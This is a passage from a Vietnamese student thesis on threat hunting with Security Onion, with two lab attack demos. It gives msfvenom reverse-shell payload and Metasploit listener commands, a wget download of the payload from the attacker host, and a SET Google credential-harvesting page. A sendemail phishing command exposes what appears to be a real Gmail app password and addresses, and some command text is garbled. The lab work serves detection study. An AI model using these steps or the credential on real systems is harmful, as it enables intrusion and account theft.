Việc mở rộng tùy chỉnh trong hệ thống có thể trở nên khó khăn đối với những người dùng không quen thuộc với kiến trúc của hệ điều hành (SO) hoặc thiếu kiến thức nền tảng vững chắc.

Quá tải log có thể xảy ra khi cài đặt cảnh báo một cách ngẫu nhiên, dẫn đến việc hệ thống tạo ra nhiều log rác cho các sự kiện không quan trọng hoặc có mức rủi ro quá thấp Điều này khiến các thông báo quan trọng dễ bị bỏ qua và làm chậm trễ phản hồi khi gặp sự cố.

Chương II đã giới thiệu tổng quan về Security Onion, từ các tính năng nổi bật đến cách nền tảng này hỗ trợ trong việc phát hiện, phân tích và săn tìm mối đe dọa tiềm ẩn Với sự tích hợp của các công cụ giám sát và phân tích mạnh mẽ như Elasticsearch, Kibana, và Zeek, Security Onion không chỉ cung cấp khả năng quan sát toàn diện mà còn tối ưu hóa quy trình Threat Hunting Đây là một giải pháp đáng tin cậy, phù hợp với nhu cầu bảo mật của nhiều tổ chức, đặc biệt trong bối cảnh các cuộc tấn công mạng ngày càng tinh vi.

Chương III sẽ khám phá ứng dụng thực tiễn của Security Onion trong việc phát hiện mối đe dọa tiềm ẩn Nội dung chương này sẽ trình bày quy trình triển khai Security Onion qua các kịch bản cụ thể, từ việc thiết lập môi trường cho đến thực hiện các cuộc săn tìm mối đe dọa, nhằm cung cấp cái nhìn chi tiết và thực tế về tiềm năng của giải pháp này.

ỨNG DỤNG CỦA SECURITY ONION TRONG VIỆC SĂN TÌM MỐI ĐE DỌA TIỀM ẨN

Malware

Kẻ tấn công đã sử dụng MSFVenom để tạo mã độc reverse shell nhằm tấn công máy Ubuntu trong mạng nội bộ của công ty ABC Mã độc được đóng gói dưới dạng tệp ELF và gửi qua email phishing giả mạo bản cập nhật phần mềm Khi nhân viên mở tệp và thực thi, mã độc kết nối ngược đến máy tấn công, cho phép kẻ xâm nhập điều khiển hệ thống từ xa Tuy nhiên, nhóm bảo mật của công ty đã nhanh chóng phát hiện sự kết nối bất thường qua hệ thống giám sát, ngắt kết nối và cô lập máy bị nhiễm, ngăn chặn kẻ tấn công truy cập vào dữ liệu nhạy cảm.

Tạo và triển khai mã độc nhằm giành quyền điều khiển từ xa máy Ubuntu.

Phân tích lưu lượng và phát hiện các hành vi bất thường qua hệ thống giám sát.

Tạo payload mã độc bằng Metasploit bằng dòng lệnh: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST2.168.6.102 LPORTD44 -f elf > payload.elf

Hình 3.3 Mô tả tạo payload mã độc bằng Metasploit

“msfvenom” : một công cụ trong bộ Metasploit Framework, được dùng để tạo các payload và shellcode tùy chỉnh.

- Thiết lập listener trên máy attacker

“-p windows/meterpreter/reverse_tcp”: Tạo payload dạng reverse shell

“LHOST”2.168.6.102: Địa chỉ IP của Kali Linux.

“LPORTD44”: Cổng để nghe kết nối.

“-f elf” : Tạo file định dạng elf (1 dạng file thực thi phổ biến trong hệ điều hành Linux).

“> payload.elf ”: Lưu file mã độc với tên payload.exThiết lập listener trên máy attacker

Thiết lập Metasploit để chờ kết nối từ mã độc: msfconsole

Hình 3.4 Mô tả thiết lập Metasploit để chờ kết nối từ mã độc

Tại giao diện Metasploit, chạy các lệnh: use exploit/multi/handlerset payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.6.102 set LPORT 4444

Hình 3.5 Mô tả thiết lập listener Metasploit cho kết nối reverse shell

“use exploit/multi/handler”: module handler, dùng để lắng nghe và quản lý kết nối từ payload

“set payload”: Loại payload tương ứng với file mã độc đã tạo

“set LHOST 192.168.6.102”: Cấu hình địa chỉ IP của máy tấn công (máy đang chạy Metasploit) để lắng nghe kết nối từ mục tiêu.

“set LPORT 4444”: Cấu hình cổng trên máy tấn công để nhận kết nối từ payload

- Gửi mã độc đến máy Victim

Trên Kali Linux, khởi động server HTTP để chia sẻ file: python3 -m http.server 8080

Hình 3.6 Mô tả cách khởi động một máy chủ HTTP đơn giản trên cổng 8080

Trên Ubuntu, tải file mã độc: wget http://192.168.6.102:8080/payload.elf -O ~/Downloads/payload.elf

Hình 3.7 Mô tả cách giả lập khi nạn nhân tải malware về máy.

Giả lập thực thi file mã độc trên máy Victim.

Hình 3.8 Mô tả cách giả lập nạn nhân thực thi mã độc

Hình 3.9 Thiết lập kênh lắng nghe thành công trên máy nạn nhân

Sau khi tấn công, ta thấy lưu lượng mạng tăng 1 cách đột ngột khi Máy victim thực thi mã độc

Hình 3.10 Mô tả lưu lương mạng khi máy trang mạng nội bộ đang bị malware tấn công

Phishing Attack

Kẻ tấn công đã gửi email phishing giả mạo từ Google, yêu cầu nhân viên công ty truy cập vào liên kết giả mạo để xác thực tài khoản Email này dẫn đến một trang đăng nhập giả, nơi người nhận phải nhập thông tin tài khoản Khi nạn nhân cung cấp email và mật khẩu, thông tin đăng nhập bị đánh cắp, cho phép kẻ tấn công truy cập vào tài khoản Gmail của họ Nhóm bảo mật công ty đã phát hiện cuộc tấn công qua giám sát và yêu cầu nhân viên thay đổi mật khẩu để ngăn chặn thiệt hại.

2.2.2 Demo quá trình tấn công.

Tải tools SET bằng câu lệnh sudo apt install set.

Hình 3.11 Mô tả câu lệnh tải công cụ SET

Khởi chạy SET bằng câu lệnh setoolkit

SET đã được cài đặt thành công, hiển thị giao diện điều khiển với các tùy chọn chính Tiếp theo, bạn có thể tạo trang web đăng nhập giả mạo của Google.

Hình 3.12 Mô tả cách tạo trang web giả mạo Google Login (1)

- Tiếp theo chọn Website Attack Vectors

Hình 3.13 Mô tả cách tạo trang web giả mạo Google Login(2)

- Tiếp theo chọn Credential Harvester Attack Method

Hình 3.14 Mô tả cách tạo trang web giả mạo Google Login(3)

- Tiếp tục chọn Web Templates

Hình 3.15 Mô tả cách tạo trang web giả mạo Google Login(4)

- Chọn Google để trang web giả mạo có Templates có trang đăng nhập củaGoogle.

Hình 3.16 Mô tả cách tạo trang web giả mạo Google Login(5)

- Sau khi hoàn tất các bước nói trên SET sẽ tạo một trang đăng nhập giả mạo Google được lưu trữ tại: http://192.168.6.102

- Gửi email phishing đến máy nạn nhân

- Tạo email bằng công cụ sendemail bằng câu lệnh : sendemail -f

"support@security.com" -t nguyenhuyhoang200242@gmail.com \-u "Google Account Verification" \-m "Click here to verify your account: http://192.168.6.102" \-s smtp.gmail.com:587 -xu vansinh2919@gmail.com -xp dexonktfctskmmrs

Nội dung email chứa đường dẫn giả mạo yêu cầu người dùng "xác minh tài khoản".

Hình 3.17 Mô tả cách tạo mail gửi đến người dùng bằng công cụ sendemail

Sau đó email phishing đã được gửi đến máy Victim với yêu cầu là xác thực tài khoản.

Hình 3.18 Mô tả email phishing đã được gửi đến nạn nhân.

Sau đó giả lập nạn nhân click vào đường dẫn được đính kèm trên email để đăng nhập.

Hình 3.19 Mô tả việc giả lập nạn nhân đăng nhập vào trang web giả mạo

Sau khi nạn nhân đăng nhập thành công, tài khoản và mật khẩu của họ đã bị lộ trên màn hình của kẻ tấn công qua một trang web Google giả mạo.

Hình 3.20 Mô tả việc nạn nhân đã bị lộ thông tin user/password của gmail.

Hình 3.21 Mô tả logs ở phần Dashboards của Security Onion

Hình 3.22 Mô tả logs ở Kibana trên Security Onion

Hình 3.23 Mô tả chi tiết của các logs

Chương này khám phá các mối đe dọa phổ biến trong hệ thống thông tin và cách Security Onion có thể phát hiện và ngăn chặn chúng trong thời gian thực Bằng cách phân tích các ví dụ về mất an toàn, bài viết chỉ ra những điểm yếu mà tội phạm mạng có thể lợi dụng Những ví dụ này nhấn mạnh tầm quan trọng của việc triển khai giải pháp giám sát liên tục và tự động để bảo vệ hệ thống.

Việc chủ động rà soát hệ thống giúp các tổ chức ngăn chặn kịp thời các sự cố an toàn thông tin (ATTT) tiềm tàng và chia sẻ thông tin IOC với cộng đồng Điều này không chỉ nâng cao khả năng phòng thủ chung về ATTT mà còn giúp các tổ chức khác trong cộng đồng nhận được thông tin tình báo về mối đe dọa, từ đó bảo vệ an toàn cho toàn bộ hệ thống.

Đồ án "Nghiên cứu xây dựng giải pháp phát hiện và săn tìm mối đe dọa an ninh mạng dựa trên công nghệ Security Onion" đã phát triển một giải pháp bảo mật toàn diện nhằm phát hiện và phản ứng hiệu quả với các mối đe dọa an ninh mạng trong môi trường doanh nghiệp Trong bối cảnh các cuộc tấn công mạng ngày càng phức tạp, đặc biệt là đối với các doanh nghiệp nhỏ và vừa, giải pháp này sử dụng công nghệ Security Onion, một nền tảng mã nguồn mở tích hợp nhiều công cụ phát hiện và phân tích sự cố bảo mật Các tính năng nổi bật như IDS, IPS và khả năng phân tích lưu lượng mạng qua Suricata, Zeek, cùng với khả năng báo cáo và phân tích sự kiện bảo mật, đã chứng minh tính hữu ích trong việc xây dựng hệ thống giám sát mạnh mẽ, giúp doanh nghiệp đối phó hiệu quả với các mối đe dọa tiềm tàng.

Qua nghiên cứu và thử nghiệm, đồ án cho thấy việc triển khai Security Onion trong môi trường ảo hóa mang lại lợi ích lớn về tiết kiệm chi phí và tài nguyên Hệ thống này không chỉ phát hiện và cảnh báo nhanh chóng các mối đe dọa tiềm ẩn mà còn hỗ trợ các chuyên gia an ninh phân tích chi tiết sự cố bảo mật Sự kết hợp giữa Kibana, ElasticSearch và Logstash trong Security Onion nâng cao khả năng phân tích và tạo báo cáo chính xác, giúp quản trị viên có cái nhìn tổng quan về sự cố an ninh mạng Đặc biệt, khả năng tự động hóa quy trình điều tra và phản ứng sự cố tiết kiệm thời gian và tăng cường hiệu quả bảo vệ hệ thống mạng cho doanh nghiệp Do đó, đồ án không chỉ nâng cao năng lực phát hiện mối đe dọa mà còn mở ra cơ hội triển khai giải pháp bảo mật tiết kiệm và hiệu quả cho các doanh nghiệp vừa và nhỏ tại Việt Nam, nơi thị trường bảo mật đang phát triển mạnh mẽ.

Trong bối cảnh thị trường an ninh mạng tại Việt Nam đang phát triển, nhiều doanh nghiệp vừa và nhỏ chưa triển khai hạ tầng SIEM do hạn chế ngân sách và nguồn lực kỹ thuật Security Onion được xem là giải pháp tối ưu với chi phí thấp nhưng hiệu quả cao Để nâng cao hiệu quả, cần tích hợp trí tuệ nhân tạo (AI) và máy học (ML) nhằm cải thiện khả năng phát hiện các mối đe dọa tinh vi và giảm tỷ lệ báo động giả Việc xây dựng tài liệu hướng dẫn chi tiết bằng tiếng Việt và tổ chức các khóa đào tạo thực hành sẽ tăng cường khả năng tiếp cận và triển khai giải pháp trong cộng đồng doanh nghiệp Hơn nữa, tích hợp Security Onion với các nền tảng quản lý như SIEM và các công cụ tự động hóa phản ứng bảo mật (SOAR) sẽ tạo ra hệ sinh thái an ninh mạng toàn diện, đáp ứng nhu cầu quản trị và phản ứng nhanh trước các cuộc tấn công mạng Phát triển các giải pháp tùy chỉnh cho từng lĩnh vực, đặc biệt ngành tài chính, sẽ giúp tổ chức bảo vệ thông tin quan trọng hiệu quả hơn Trong tương lai, Security Onion sẽ trở thành nền tảng quan trọng thúc đẩy chiến lược an ninh mạng tại Việt Nam, góp phần xây dựng môi trường an toàn thông tin vững chắc trong thời kỳ chuyển đổi số.

Ngày đăng: 14/12/2024, 19:05

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w